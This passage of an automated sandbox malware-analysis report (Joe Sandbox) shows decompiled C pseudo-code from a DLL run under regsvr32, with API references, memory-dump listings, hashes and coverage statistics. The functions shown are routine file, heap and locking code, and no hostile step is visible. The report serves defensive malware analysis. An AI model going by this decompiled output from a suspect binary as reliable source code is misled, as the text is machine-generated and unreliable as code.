					_t22 = SetFilePointer(_t21, _v12,  &_v8, _a16);
					_v12 = _t22;
					if(_t22 != _t39 || GetLastError() == 0) {
						_t15 = ((_t42 & 0x0000001f) + (_t42 & 0x0000001f) * 8) * 4; // 0x0
						 *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t42 >> 5) * 4)) + _t15 + 4) & 0x000000fd;
						_t27 = _v12;
					} else {
						E10013707(_t28);
						goto L5;
					}
				} else {
					 *((intOrPtr*)(E100136F5())) = 9;
					L5:
					_t27 = _t39;
				}
				return _t27;
			}











                                                                                                            0x1001b199
                                                                                                            0x1001b19c
                                                                                                            0x1001b1a2
                                                                                                            0x1001b1a4
                                                                                                            0x1001b1a7
                                                                                                            0x1001b1ac
                                                                                                            0x1001b1b2
                                                                                                            0x1001b1cc
                                                                                                            0x1001b1d4
                                                                                                            0x1001b1d7
                                                                                                            0x1001b202
                                                                                                            0x1001b206
                                                                                                            0x1001b209
                                                                                                            0x1001b1e3
                                                                                                            0x1001b1e4
                                                                                                            0x00000000
                                                                                                            0x1001b1e9
                                                                                                            0x1001b1b4
                                                                                                            0x1001b1b9
                                                                                                            0x1001b1ea
                                                                                                            0x1001b1ea
                                                                                                            0x1001b1ec
                                                                                                            0x1001b212

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,1004C878,00000001,00000000,00000000,00000000,1004C878,1004C878,?,10019815,?,00000000,00000000,00000002,00000000,1004C878), ref: 1001B1CC
                                                                                                            • GetLastError.KERNEL32 ref: 1001B1D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction ID: 53af0a452f36b2f0e5d3ec892390ecf8c1e17cdf248c2bebef8a867a22bb85e5
                                                                                                            • Opcode Fuzzy Hash: 9ba7a4b55cc6b9151db88e243d1aee17f864ad0bfb3139241dfe53ebd75a8a52
                                                                                                            • Instruction Fuzzy Hash: FD018476A10659FFCB01DF99CC94C9E7BB9EF45360B154259F410DB191EB70EE808760
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001968C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001968C(void* __eflags, signed int _a4, long _a8, long _a12) {
				void* _t11;
				long _t13;
				signed int _t17;
				signed int _t19;
				signed int _t27;
				signed int _t29;

				_t29 = _a4;
				_t11 = E1001B08D(_t29);
				if(_t11 != 0xffffffff) {
					_t27 = SetFilePointer(_t11, _a8, 0, _a12);
					if(_t27 != 0xffffffff) {
						_t13 = 0;
					} else {
						_t13 = GetLastError();
					}
					if(_t13 == 0) {
						_t9 = ((_t29 & 0x0000001f) + (_t29 & 0x0000001f) * 8) * 4; // 0x1004c87c
						 *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) =  *( *((intOrPtr*)(0x1004f920 + (_t29 >> 5) * 4)) + _t9 + 4) & 0x000000fd;
						_t17 = _t27;
					} else {
						_t17 = E10013707(_t13) | 0xffffffff;
					}
					return _t17;
				} else {
					_t19 = E100136F5();
					 *_t19 = 9;
					return _t19 | 0xffffffff;
				}
			}









                                                                                                            0x1001968d
                                                                                                            0x10019692
                                                                                                            0x1001969b
                                                                                                            0x100196bf
                                                                                                            0x100196c4
                                                                                                            0x100196ce
                                                                                                            0x100196c6
                                                                                                            0x100196c6
                                                                                                            0x100196c6
                                                                                                            0x100196d2
                                                                                                            0x100196f4
                                                                                                            0x100196f8
                                                                                                            0x100196fb
                                                                                                            0x100196d4
                                                                                                            0x100196db
                                                                                                            0x100196db
                                                                                                            0x100196ff
                                                                                                            0x1001969d
                                                                                                            0x1001969d
                                                                                                            0x100196a2
                                                                                                            0x100196ac
                                                                                                            0x100196ac

                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(00000000,?,00000000,?,?,00000000,10019757,1004C878,00000000,10015998,10042D38,0000000C,1001566D,?,00000000,00000002), ref: 100196B9
                                                                                                            • GetLastError.KERNEL32 ref: 100196C6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 2976181284-4125583295
                                                                                                            • Opcode ID: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction ID: a629910bf8626f7fffa0a6a4af3c3ed297814fe42fece7765db2dd3634906eea
                                                                                                            • Opcode Fuzzy Hash: 68e3d03425bb9cabc03b1a0108c4a9615d7641a77f49b79bc778628c12f12515
                                                                                                            • Instruction Fuzzy Hash: 2201A4362096616BCA11DF7CAC5594A3B94DB86370F220749F570CF1E1DB30EC818771
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025478 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 71%
                                                                                                            			E10025478(void* __ecx, void* _a4, long _a8) {
				void* __ebp;
				int _t8;
				long _t13;
				void* _t14;
				void* _t15;

				_t12 = __ecx;
				_t13 = _a8;
				_t14 = __ecx;
				if(_t13 != 0) {
					_t8 = WriteFile( *(__ecx + 4), _a4, _t13,  &_a8, 0);
					if(_t8 == 0) {
						_t8 = E100271C6(_t15, GetLastError(),  *((intOrPtr*)(_t14 + 0xc)));
					}
					if(_a8 != _t13) {
						_push( *((intOrPtr*)(_t14 + 0xc)));
						_push(0xffffffff);
						_push(0xd);
						return E10027180(_t12);
					}
				}
				return _t8;
			}








                                                                                                            0x10025478
                                                                                                            0x1002547d
                                                                                                            0x10025482
                                                                                                            0x10025484
                                                                                                            0x10025493
                                                                                                            0x1002549b
                                                                                                            0x100254a7
                                                                                                            0x100254a7
                                                                                                            0x100254af
                                                                                                            0x100254b1
                                                                                                            0x100254b4
                                                                                                            0x100254b6
                                                                                                            0x00000000
                                                                                                            0x100254b8
                                                                                                            0x100254af
                                                                                                            0x100254c0

                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 10025493
                                                                                                            • GetLastError.KERNEL32(?), ref: 100254A0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 442123175-4125583295
                                                                                                            • Opcode ID: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction ID: 1efd054c324430f6bdfd1b59f081dc2d54efa2d2671d6c80a9c9a9e690e28720
                                                                                                            • Opcode Fuzzy Hash: ab0e3457abfdb6784960fbcafb9409f2e606667c52f2adbf15f487c772deef89
                                                                                                            • Instruction Fuzzy Hash: 74F0A7362006187FDB11AF96EC04F87BBACEF40772F40C11AF92985060D731D5508B61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10025438 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10025438(void* __ecx, void* _a4, long _a8) {
				void* __ebp;
				void* _t15;
				void* _t16;

				_t15 = __ecx;
				if(_a8 != 0) {
					if(ReadFile( *(__ecx + 4), _a4, _a8,  &_a8, 0) == 0) {
						E100271C6(_t16, GetLastError(),  *((intOrPtr*)(_t15 + 0xc)));
					}
					return _a8;
				}
				return 0;
			}






                                                                                                            0x10025440
                                                                                                            0x10025442
                                                                                                            0x1002545f
                                                                                                            0x1002546b
                                                                                                            0x1002546b
                                                                                                            0x00000000
                                                                                                            0x10025470
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,00000000,00000000), ref: 10025457
                                                                                                            • GetLastError.KERNEL32(00000000), ref: 10025464
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction ID: 9f7230fa58b18192531b9e87cef107ece2d112799f9fd2653fc72eebc1d7825c
                                                                                                            • Opcode Fuzzy Hash: 8e1365c80fcfabd30bbf1da311fd5a14f49e0aa91301eb25eec651b4f5fe3069
                                                                                                            • Instruction Fuzzy Hash: EDE09232100218BFDB01AFA0EC04FCAB7ACEF08266F80C426FD19C9020D731EA509B54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10024C8E Relevance: 5.1, APIs: 4, Instructions: 107stringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 97%
                                                                                                            			E10024C8E(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a11, CHAR* _a12, char* _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* __ebp;
				intOrPtr _t39;
				int _t40;
				void* _t50;
				char* _t51;
				intOrPtr _t52;
				char* _t61;
				signed int _t62;
				CHAR* _t64;
				signed int _t73;
				void* _t74;
				CHAR* _t82;
				intOrPtr _t85;
				intOrPtr _t87;

				_t39 =  *0x1004c470; // 0xf3933a06
				_v8 = _t39;
				_v272 = __ecx;
				if(_a12 == 0) {
					L10:
					_t40 = 0;
					__eflags = 0;
					L11:
					return E100117AE(_t40, _v8);
				}
				_t73 = _a8 << 2;
				_t85 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t73)) - 0xc));
				if(_t85 == 0) {
					goto L10;
				}
				_t77 = _a4;
				_t82 = E100017D0(_a4, _t85 + 1);
				if(_t82 == 0) {
					E1001CE3B(_t77);
				}
				_t74 = lstrcpynA;
				lstrcpynA(_t82,  *( *((intOrPtr*)(_v272 + 8)) + _t73), _t85 + 1);
				_t50 = E10038481(_t82, 0, 0);
				_t51 = _a16;
				_t87 = _t85 - _t50 + 1;
				_v276 = _t87;
				if(_t87 != _t51) {
					L7:
					_t52 = _v272;
					__eflags =  *((intOrPtr*)(_t52 + 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t52 + 0x18)) != 0xffffffff) {
						_a12 = _t87 + _t82;
						E1002565C(_t82, 0x104, _t87 + _t82,  &_v268, 0x104);
						__eflags = 0x104;
						lstrcpynA(_a12,  &_v268, 0x104 - _v276);
						E10024AA1(__eflags, _t82,  *((intOrPtr*)(_v272 + 0x18)), _a20);
					}
					goto L9;
				} else {
					_t61 = _t51 + _t82;
					_a11 =  *((intOrPtr*)(_t87 + _t82));
					_a16 = _t61;
					 *_t61 = 0;
					_t62 = lstrcmpiA(_a12, _t82);
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					_a12 = _t64;
					 *((char*)(_t87 + _t82)) = _a11;
					if(_t64 == 0) {
						goto L7;
					}
					E1002565C(_t82, 0x104, _a16,  &_v268, 0x104);
					lstrcpynA(_t82,  &_v268, 0x104);
					L9:
					E10006CE2(_t74, _a4, _t82, 0xffffffff);
					_t40 = 1;
					goto L11;
				}
			}





















                                                                                                            0x10024c9b
                                                                                                            0x10024ca1
                                                                                                            0x10024ca5
                                                                                                            0x10024cab
                                                                                                            0x10024db7
                                                                                                            0x10024db7
                                                                                                            0x10024db7
                                                                                                            0x10024db9
                                                                                                            0x10024dc4
                                                                                                            0x10024dc4
                                                                                                            0x10024cb7
                                                                                                            0x10024cbd
                                                                                                            0x10024cc2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10024cc8
                                                                                                            0x10024cd5
                                                                                                            0x10024cd9
                                                                                                            0x10024cdb
                                                                                                            0x10024cdb
                                                                                                            0x10024cf0
                                                                                                            0x10024cf7
                                                                                                            0x10024cfe
                                                                                                            0x10024d05
                                                                                                            0x10024d08
                                                                                                            0x10024d0b
                                                                                                            0x10024d11
                                                                                                            0x10024d5d
                                                                                                            0x10024d5d
                                                                                                            0x10024d63
                                                                                                            0x10024d67
                                                                                                            0x10024d7a
                                                                                                            0x10024d7d
                                                                                                            0x10024d82
                                                                                                            0x10024d93
                                                                                                            0x10024da2
                                                                                                            0x10024da2
                                                                                                            0x00000000
                                                                                                            0x10024d13
                                                                                                            0x10024d1a
                                                                                                            0x10024d1c
                                                                                                            0x10024d1f
                                                                                                            0x10024d22
                                                                                                            0x10024d25
                                                                                                            0x10024d2d
                                                                                                            0x10024d2f
                                                                                                            0x10024d30
                                                                                                            0x10024d36
                                                                                                            0x10024d39
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10024d4b
                                                                                                            0x10024d59
                                                                                                            0x10024da7
                                                                                                            0x10024dac
                                                                                                            0x10024db3
                                                                                                            0x00000000
                                                                                                            0x10024db4

                                                                                                            APIs
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?), ref: 10024CF7
                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 10024D25
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000104), ref: 10024D59
                                                                                                              • Part of subcall function 1002565C: GetFileTitleA.COMDLG32(?,?,00000000,00000000,00000104), ref: 1002568C
                                                                                                            • lstrcpynA.KERNEL32(00000000,?,?,?,?,00000104,00000000,00000000,00000000), ref: 10024D93
                                                                                                              • Part of subcall function 10024AA1: lstrlenA.KERNEL32(?), ref: 10024AAC
                                                                                                              • Part of subcall function 10024AA1: lstrcpyA.KERNEL32(?,?,?,00000000,00000000), ref: 10024B2D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrcpyn$FileTitlelstrcmpilstrcpylstrlen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1551867014-0
                                                                                                            • Opcode ID: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction ID: f695b848086fad3498a552c61b02124914b138edf6a9cb0088e4b153e3f01fcd
                                                                                                            • Opcode Fuzzy Hash: c3aea5b0b5321b77845ea1e1ecdd5d5eec89cf7256d8616176723767fef7d287
                                                                                                            • Instruction Fuzzy Hash: 39418B76900269AFCB51CF68DC80EEA77F9EF49344F010199F99997251DB70EE81CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10013EDE Relevance: 5.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10013EDE() {
				signed int _t15;
				void* _t17;
				void* _t18;
				intOrPtr* _t20;
				void* _t24;
				signed int _t26;
				void* _t27;
				intOrPtr* _t30;

				_t15 =  *0x10050a48; // 0x0
				_t26 =  *0x10050a58; // 0x0
				if(_t15 != _t26) {
					L4:
					_t27 =  *0x10050a4c; // 0x0
					_t30 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x10050a60, 8, 0x41c4);
					 *(_t30 + 0x10) = _t17;
					if(_t17 != 0) {
						_t18 = VirtualAlloc(0, 0x100000, 0x2000, 4);
						 *(_t30 + 0xc) = _t18;
						if(_t18 != 0) {
							 *(_t30 + 8) =  *(_t30 + 8) | 0xffffffff;
							 *_t30 = 0;
							 *((intOrPtr*)(_t30 + 4)) = 0;
							 *0x10050a48 =  *0x10050a48 + 1;
							 *( *(_t30 + 0x10)) =  *( *(_t30 + 0x10)) | 0xffffffff;
							_t20 = _t30;
						} else {
							HeapFree( *0x10050a60, 0,  *(_t30 + 0x10));
							goto L5;
						}
					} else {
						L5:
						_t20 = 0;
					}
					return _t20;
				} else {
					_t2 = _t26 * 4; // 0x50
					_t24 = HeapReAlloc( *0x10050a60, 0,  *0x10050a4c, _t26 + _t2 + 0x50 << 2);
					if(_t24 != 0) {
						 *0x10050a58 =  *0x10050a58 + 0x10;
						 *0x10050a4c = _t24;
						_t15 =  *0x10050a48; // 0x0
						goto L4;
					} else {
						return 0;
					}
				}
			}











                                                                                                            0x10013ede
                                                                                                            0x10013ee3
                                                                                                            0x10013eee
                                                                                                            0x10013f24
                                                                                                            0x10013f24
                                                                                                            0x10013f3b
                                                                                                            0x10013f3e
                                                                                                            0x10013f46
                                                                                                            0x10013f49
                                                                                                            0x10013f5c
                                                                                                            0x10013f64
                                                                                                            0x10013f67
                                                                                                            0x10013f7b
                                                                                                            0x10013f7f
                                                                                                            0x10013f81
                                                                                                            0x10013f84
                                                                                                            0x10013f8d
                                                                                                            0x10013f90
                                                                                                            0x10013f69
                                                                                                            0x10013f73
                                                                                                            0x00000000
                                                                                                            0x10013f73
                                                                                                            0x10013f4b
                                                                                                            0x10013f4b
                                                                                                            0x10013f4b
                                                                                                            0x10013f4b
                                                                                                            0x10013f94
                                                                                                            0x10013ef0
                                                                                                            0x10013ef0
                                                                                                            0x10013f05
                                                                                                            0x10013f0d
                                                                                                            0x10013f13
                                                                                                            0x10013f1a
                                                                                                            0x10013f1f
                                                                                                            0x00000000
                                                                                                            0x10013f0f
                                                                                                            0x10013f12
                                                                                                            0x10013f12
                                                                                                            0x10013f0d

                                                                                                            APIs
                                                                                                            • HeapReAlloc.KERNEL32(00000000,00000050,00000000,100144CF,00000000,?,00000000), ref: 10013F05
                                                                                                            • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,100144CF,00000000,?,00000000), ref: 10013F3E
                                                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 10013F5C
                                                                                                            • HeapFree.KERNEL32(00000000,?), ref: 10013F73
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocHeap$FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 3499195154-0
                                                                                                            • Opcode ID: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction ID: aeb6b17fbef21620812925e1521d5c5e2c0640cb2d2eb2dc13b54a0eeae557ec
                                                                                                            • Opcode Fuzzy Hash: a18a375ed843d8de620d0934ad43bbd3cfe597e7cee0163713e7808ce4255d75
                                                                                                            • Instruction Fuzzy Hash: D0116D346003659FE761CF19DCC5D1A7BB1FB81760710852DF156DA5B1C3719882DB01
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10037A1B Relevance: 5.0, APIs: 4, Instructions: 33COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10037A1B(signed int _a4) {
				struct _CRITICAL_SECTION* _t13;
				signed int _t21;
				intOrPtr* _t24;

				if( *0x1004f350 == 0) {
					E100379F7();
				}
				_t21 = _a4;
				_t24 = 0x1004f158 + _t21 * 4;
				if( *_t24 == 0) {
					EnterCriticalSection(0x1004f19c);
					if( *_t24 == 0) {
						InitializeCriticalSection(0x1004f1b8 + (_t21 + _t21 * 2) * 8);
						 *_t24 =  *_t24 + 1;
					}
					LeaveCriticalSection(0x1004f19c);
				}
				_t13 = 0x1004f1b8 + (_t21 + _t21 * 2) * 8;
				EnterCriticalSection(_t13);
				return _t13;
			}






                                                                                                            0x10037a22
                                                                                                            0x10037a24
                                                                                                            0x10037a24
                                                                                                            0x10037a32
                                                                                                            0x10037a36
                                                                                                            0x10037a40
                                                                                                            0x10037a49
                                                                                                            0x10037a4e
                                                                                                            0x10037a5b
                                                                                                            0x10037a61
                                                                                                            0x10037a61
                                                                                                            0x10037a64
                                                                                                            0x10037a6a
                                                                                                            0x10037a6e
                                                                                                            0x10037a76
                                                                                                            0x10037a7b

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A49
                                                                                                            • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A5B
                                                                                                            • LeaveCriticalSection.KERNEL32(1004F19C,?,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A64
                                                                                                            • EnterCriticalSection.KERNEL32(00000000,00000000,?,00000000,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A76
                                                                                                              • Part of subcall function 100379F7: InitializeCriticalSection.KERNEL32(1004F19C,10037A29,100375D3,00000010,?,?,00000000,?,?,100373DA,1003738D,100347FD,100071DC), ref: 10037A0F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterInitialize$Leave
                                                                                                            • String ID:
                                                                                                            • API String ID: 713024617-0
                                                                                                            • Opcode ID: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction ID: b71c326a3937b492ac304e5451021ab9c1c46bd2d9d00a0dd2066787caa8deb7
                                                                                                            • Opcode Fuzzy Hash: 2a6b980db9533a80bee2071cb613a1de34b70dec757d7447317d0fbaf167c0ba
                                                                                                            • Instruction Fuzzy Hash: EFF0493200026EEFD711EF95CC88A66B3ACFB85322F40082AE148C2022D734B556CAA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.4%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:436
                                                                                                            Total number of Limit Nodes:23
